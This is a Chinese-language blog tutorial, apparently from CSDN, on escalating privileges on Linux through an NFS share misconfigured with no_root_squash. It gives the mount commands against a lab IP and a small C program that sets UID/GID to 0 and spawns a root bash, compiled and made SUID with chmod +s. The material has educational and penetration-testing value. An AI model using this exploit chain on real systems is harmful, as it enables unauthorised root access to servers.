NFS提权

最新推荐文章于 2024-09-30 08:30:14 发布
最新推荐文章于 2024-09-30 08:30:14 发布
阅读量159 收藏 3
点赞数 3
分类专栏: Linux提权 文章标签: 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_68636078/article/details/142463724
版权

简介

NFS(网络文件系统)是一种在端口TCP/UDP2049上运行的网络文件共享协议,由服务器和客户端两个组件组成。NFS服务器上创建共享目录,可以通过网络与其他Linux客户端共享文件。获得权限的用户可以将文件添加到共享中,并与有权访问该目录的其他用户共享。

提权原理

默认情况下,每个NFS共享都会启用root_squash功能,以防止共享文件拥有root:root身份或特殊权限(即启用root_squash后,所有共享文件都会变成nobody:nogroup身份)。但是,如果启用了no_root_squash功能,文件可以以root身份存在,这就容易导致权限升级。

利用条件

no_root_squash选项开启

查看/etc/exports文件

# /etc/exports: the access control list for filesystems which may be exported
# to NFS clients. See exports(5).

# NFS共享的示例目录:/srv/nfs_share
# 允许指定的IP网段 * 访问该共享,具有读写权限。
# no_root_squash 允许客户端的root用户在NFS服务器上有root权限。

/tmp *(rw,sync,no_root_squash,no_subtree_check)

# 解释:
# rw - 读写权限
# sync - 数据在写入后立即保存
# no_root_squash - 客户端的root用户将映射为NFS服务器上的root用户
# no_subtree_check - 禁用子目录检查,提高性能

案例

1、查看/etc/exports,发现为no_root_squash

cat /etc/exports

2、列举可挂载份额

showmount -e 192.168.74.131

3、创建目录,并挂载

mkdir /tmp/door
mount -o rw 192.168.74.131:/tmp /tmp/door

此时访问本地的/tmp/door就相当于访问目标机的/tmp

4、创建一个SUID的可执行文件

int main()
{ setgid(0);
  setuid(0);
  system("/bin/bash");
  return 0;
}

进行编译并赋予S权限

gcc nfs.c -o nfs -w
chmod +s nfs

5、在目标机上运行该文件

./nfs

注意:如果报错,可能版本不一致,建议在GLIBC相同的版本上进行编译  

可乐葡萄糖
关注
专栏目录
Linux提权姿势二:利用NFS提权
09-01
Linux 提权姿势二:利用 NFS 提权 Linux 提权姿势二:利用 NFS 提权是指在 Linux 系统中,利用 NFS(Network File System)共享来升级特权的一种方法。当我们拥有低特权的 shell 并且发现服务器中具有 NFS 共享时,...
权限提升-linux提权手法总结
01-14
网络文件系统(NFS)如果配置不当,可能会暴露系统资源,从而成为提权的途径。 #### 8. Suid和Guid配置错误 当文件被标记为SUID或SGID时,任何运行该文件的用户都会以文件所有者的权限执行该文件。如果这些权限被...
NFS挂载提权
m0_71300782的博客
09-08 312
2.点击你登录靶场虚拟机的用户名文件新建yige.ssh文件把公钥复制到这里面(.ssh是隐藏文件把它显示出来)authorized_keys(记得不要后缀)二、然后使用WinScp连接工具连接提权靶场。一、首先在kali的桌面创建公钥、私钥。发现在桌面创建了俩个文件夹,就是公私钥。ssh bob@提权靶场的ip地址。三、再回到kali在控制面板输入。1.在桌面打开控制面板shur。3.把公钥复制进去把文件名改成。1.使用WinScp连接。2.把公私钥复制到桌面。
nfs 挂载提权 + docker 用户组提权
m0_55628907的博客
09-08 399
目标机器192.168.206.143 需开启2049 nfs端口在攻击机kali安装nfs:查看目标开放的文件夹回显:/home/peter * 说明可挂载/home/peter的所有目录。
【甄选靶场】Vulnhub百个项目渗透——项目四十四:44-pegasus:1(格式化字符串缓冲区溢出,nfs提权
人间体佐菲的博客
10-23 893
【甄选靶场】Vulnhub百个项目渗透——项目四十四:44-pegasus:1(格式化字符串缓冲区溢出,nfs提权
Linux 提权学习
Goodric的博客
04-15 936
提权的目的是获取 root 权限 root 权限可获取 shadow 文件中的密码 Hash,若内网环境中存在「账户/密码复用」的情况,可用于横向扩展
Linux 提权-NFS 共享
m0_73464010的博客
07-21 1072
NFS(网络文件系统)是一种在端口2049上运行的网络文件共享协议,由服务器和客户端两个组件组成。NFS服务器上创建共享目录,可以通过网络与其他Linux客户端共享文件。获得权限的用户可以将文件添加到共享中,并与有权访问该目录的其他用户共享。默认情况下,每个NFS共享都会启用功能,以防止共享文件拥有root:root身份或特殊权限(即启用后,所有共享文件都会变成身份)。但是,如果启用了功能,文件可以以root身份存在,这就容易导致权限升级。我们将在本文中展示这种情况。
linux exports共享权限,Linux NFS提权 Linux N​​FS共享权限提升
weixin_33304597的博客
04-30 422
最近在渗透测试评估期间,我能够使用“ / etc / exports”中的弱NFS权限获得Linux权限提升。最初,我通过利用易受攻击的服务获得了有限权限的受限shell访问。开始重新审核权限升级到root访问权限但无法获得“通常的嫌疑人”(内核漏洞利用,易受攻击的服务等)。没有进一步的linux权限升级进展我回到了我的预先限制的shell侦察结果,重要的是要提到渗透测试人员在获得初始shell访...
权限提升-Linux系统权限提升篇&Vulnhub&PATH变量&NFS服务&Cron任务&配合SUID
siu~
03-31 503
1、Web或普通用户到Linux-服务安全配合SUID-NFS 2、普通用户到Linux-环境变量配合SUID-$PATH 3、Web或普通用户到Linux-计划任务权限不当-Cron 章节点: 1、Web权限提升及转移 2、系统权限提升及转移 3、宿主权限提升及转移 4、域控权限提升及转移
Linux提权方法总结
Ays.Ie的博客
11-06 3847
Linux提权方式总结
linux 提权总结
weixin_51681694的博客
06-13 7660
会继续补充.....
linux提权总结8大类型,30多种方式
09-27
这些方法涵盖了内核提权、服务提权、sudo提权、suid提权、sgid提权、定时任务提权nfs提权等。 1. **内核提权** - 内核提权通常涉及利用内核中的漏洞来获得更高的权限。一种常见的方法是通过所谓的“脏牛”漏洞...
服务器感染了.baxia勒索病毒,如何确保数据文件完整恢复?
数据恢复研究℃
09-28 627
baxia勒索病毒是一种设计精巧的恶意软件,它通过加密受害者的文件并更改文件扩展名为“.baxia”,使得数据无法正常访问。一旦感染,该病毒会扫描计算机中的图像、视频、生产力文档等文件(如.doc、.docx、.xls、.pdf等),并对这些文件进行加密。加密完成后,病毒会显示一个包含勒索信息的文件,要求受害者支付比特币等加密货币以换取数据访问权。.baxia勒索病毒不仅具备自我升级能力,能够通过网络自我更新其加密算法和传播技术,还使用伪装技术隐藏在正常的文件和应用程序中,避开传统的防病毒扫描。
服务器被挂马,导致网站首页被更改怎么解决
KookeeyLena7的博客
09-27 1297
服务器被挂马并导致网站首页被篡改时,说明服务器或网站的安全性遭到破坏。
mobaxterm、vscode通过跳板机连接服务器
weixin_43815222的博客
09-27 387
点击登录,会输入密码,成功。
电脑加密机的基本功能与模块
最新发布
SafePloy_SH的博客
09-30 652
当需要传输数据时,加密机会将数据进行加密处理,使得数据在传输过程中以密文的形式存在,从而防止数据被未经授权的人员获取和篡改。加密机与主机之间使用TCP/IP协议通信,因此对主机的类型和主机操作系统无特殊要求,但仍需确保加密机与主机的硬件和软件环境相匹配。电脑加密机,又称主机加密机,是一种通过国家商用密码主管部门鉴定并批准使用的国内自主开发的主机加密设备。功能:电脑加密机主要通过使用密码学算法对数据进行加密和解密,以保护数据的机密性和完整性。性能:加密机的性能会影响加密和解密的速度以及系统的整体性能。
RM服务器研究(一)
u010401391的专栏
09-28 692
TCP 123.99.199.149:1054 127.0.0.1:20220【地图网关/登录服端口,服务器内部用到】 ESTABLISHED 3104。C:\Users\Administrator>tasklist|findstr "svMapCenter"【统计在线人数,相当于协调服,端口10113】C:\Users\Administrator>tasklist|findstr "svIP"【相当于登录服,端口10100】选择Binary search。
Linux 文件目录结构(详细)
2301_80035882的博客
09-26 651
Linux的文件系统是采用级层式的树状目录结构,在此结构中的最上层是根目录“/”,然后在此目录下再创建其他的目录。Linux世界中,一切皆文件!
NFS提权技巧:突破Linux低权限环境
- 如果希望利用NFS提权,通常需要禁用no_root_squash选项,以便远程用户能够以root权限访问目标系统。 2. **利用NFS获取RootShell**: - 提权的关键在于检查和理解 `/etc/exports` 文件,该文件定义了哪些目录和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值